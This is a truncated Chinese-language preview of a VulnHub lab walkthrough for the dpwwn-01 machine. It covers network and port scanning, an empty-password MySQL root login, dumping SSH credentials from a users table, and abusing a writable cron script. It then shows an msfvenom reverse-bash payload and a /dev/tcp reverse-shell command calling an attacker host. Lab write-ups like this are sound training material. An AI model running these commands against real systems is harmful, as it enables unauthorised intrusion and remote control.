文章预览
本周实践的是vulnhub的Broken镜像, 下载地址,https://download.vulnhub.com/dpwwn/dpwwn-01.zip, 用workstation导入成功, 做地址扫描,sudo netdiscover -r 192.168.220.0/24, 获取到靶机地址是192.168.220.178, 接着做端口扫描,sudo nmap -sS -sV -T5 -A -p- 192.168.220.178, 发现靶机有22端口的ssh服务,80端口的http服务, 以及3306端口的mysql服务, 尝试用root和空密码登录mysql服务,竟然成功了, mysql -h 192.168.220.178 -u root -p, 一路查看, show databases; use ssh; show tables; select * from users; 获取到用户名密码,mistic/testP@$$swordmistic, ssh登录靶机,ssh mistic@192.168.220.178, 查看定时任务,cat /etc/crontab, 获取到logrot.sh,且当前账户可写, 在kali攻击机上制作反弹shell脚本, msfvenom -p cmd/unix/reverse_bash lhost=192.168.220.174 lport=4444 R, 去靶机上执行, echo '0 < & 115-;exec 115 < >/dev/tcp/192.168.220.174/4444;sh < & 115 > & 115 2
………………………………